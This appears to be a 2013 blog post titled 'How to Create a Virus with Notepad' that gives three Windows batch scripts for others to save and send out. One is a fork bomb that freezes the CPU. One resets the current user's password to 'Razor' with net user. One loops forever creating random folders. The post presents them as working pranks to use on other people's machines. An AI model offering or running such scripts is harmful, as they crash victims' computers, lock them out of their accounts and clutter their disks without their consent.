Tuesday 23 April 2013

How to Create a Virus with Notepad 100% Working Tricks

Hi I am share How to How to Create a Virus with Notepad  Its really working. Make Virus and sen

How to Create your Own Virus using Batch Scripting

All code open notepad and save .bat file 

So lest start 

1 Freezes the CPU

  %0|%0
 save cpu.bat


1 Change Computer Password


@echo off
::--Change Pass To Razor--::
net user %username% Razor
::---------------------------::

 save anything.bat

Make an Infinity of Folders

@echo off
:ztuts
md %random%
goto ztuts

 


No comments:

Post a Comment